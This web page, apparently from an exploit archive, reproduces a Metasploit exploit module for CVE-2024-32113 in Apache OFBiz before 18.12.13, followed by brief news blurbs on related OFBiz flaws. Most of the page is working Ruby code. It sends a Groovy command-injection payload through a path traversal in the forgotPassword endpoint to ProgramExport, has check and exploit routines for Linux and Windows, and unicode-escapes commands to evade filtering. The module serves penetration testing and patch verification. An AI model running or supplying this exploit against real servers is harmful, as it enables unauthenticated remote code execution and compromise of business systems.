Headline
Apache OFBiz Forgot Password Directory Traversal
Apache OFBiz versions prior to 18.12.13 are vulnerable to a path traversal vulnerability. The vulnerable endpoint /webtools/control/forgotPassword allows an attacker to access the ProgramExport endpoint which in turn allows for remote code execution in the context of the user running the application.
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Apache OFBiz Forgot Password Directory Traversal', 'Description' => %q{ Apache OFBiz versions prior to 18.12.13 are vulnerable to a path traversal vulnerability. The vulnerable endpoint /webtools/control/forgotPassword allows an attacker to access the ProgramExport endpoint which in turn allows for remote code execution in the context of the user running the application. }, 'Author' => [ 'Mr-xn', # PoC 'jheysel-r7' # module ], 'References' => [ [ 'URL', 'https://github.com/Mr-xn/CVE-2024-32113'], [ 'URL', 'https://xz.aliyun.com/t/14733?time__1311=mqmx9Qwx0WDsd5YK0%3Dai%3Dmd7KbxGupD&alichlgref=https%3A%2F%2Fgithub.com%2FMr-xn%2FCVE-2024-32113'], [ 'CVE', '2024-32113'] ], 'License' => MSF_LICENSE, 'Platform' => %w[linux win], 'Privileged' => true, # You get a root session when exploiting a docker container though user level session on Windows. 'Arch' => [ ARCH_CMD ], 'Targets' => [ [ 'Linux Command', { 'Platform' => ['linux', 'unix'], 'Arch' => [ARCH_CMD], 'Type' => :unix_cmd } ], [ 'Windows Command', { 'Platform' => ['win'], 'Arch' => [ARCH_CMD], 'Type' => :win_cmd } ], ], 'Payload' => { 'BadChars' => "\x3a" }, 'DefaultTarget' => 0, 'DisclosureDate' => '2024-05-30', 'Notes' => { 'Stability' => [ CRASH_SAFE, ], 'SideEffects' => [ ARTIFACTS_ON_DISK, ], 'Reliability' => [ REPEATABLE_SESSION, ] }, 'DefaultOptions' => { 'SSL' => true, 'RPORT' => 8443 } ) ) end def send_cmd_injection(cmd) data = "groovyProgram=throw+new+Exception('#{cmd}'.execute().text);" send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/webtools/control/forgotPassword;/ProgramExport'), 'headers' => { 'HOST' => '127.0.0.1' }, 'method' => 'POST', 'data' => data }) end def check echo_test_string = rand_text_alpha(8..12) case target['Type'] when :win_cmd test_payload = to_unicode_escape("cmd.exe /c echo #{echo_test_string}") when :unix_cmd test_payload = to_unicode_escape("echo #{echo_test_string}") else return CheckCode::Unknown('Please select a valid target') end res = send_cmd_injection(test_payload) return CheckCode::Unknown('Target did not respond to check.') unless res unless res.get_html_document&.xpath("//div[@class='content-messages errorMessage' and .//p[contains(text(), 'java.lang.Exception: #{echo_test_string}')]]")&.empty? return CheckCode::Vulnerable('Tested remote code execution successfully') end CheckCode::Safe('Attempting to exploit vulnerability failed.') end def to_unicode_escape(str) str.chars.map { |char| '\\u%04x' % char.ord }.join end def exploit print_status('Attempting to exploit...') res = '' case target['Type'] when :win_cmd res = send_cmd_injection(payload.encoded) when :unix_cmd res = send_cmd_injection(to_unicode_escape("sh -c $@|sh . echo #{payload.raw}")) else fail_with(Failure::BadConfig, 'Invalid target specified') end print_error('The target responded to the exploit attempt which is not expected. The exploit likely failed') if res endend
Related news
A new security flaw has been addressed in the Apache OFBiz open-source enterprise resource planning (ERP) system that, if successfully exploited, could lead to unauthenticated remote code execution on Linux and Windows. The high-severity vulnerability, tracked as CVE-2024-45195 (CVSS score: 7.5), affects all versions of the software before 18.12.16. "An attacker with no valid
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added a critical security flaw affecting the Apache OFBiz open-source enterprise resource planning (ERP) system to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild. The vulnerability, known as CVE-2024-38856, carries a CVSS score of 9.8, indicating critical severity.
A new zero-day pre-authentication remote code execution vulnerability has been disclosed in the Apache OFBiz open-source enterprise resource planning (ERP) system that could allow threat actors to achieve remote code execution on affected instances. Tracked as CVE-2024-38856, the flaw has a CVSS score of 9.8 out of a maximum of 10.0. It affects Apache OFBiz versions prior to 18.12.15. "The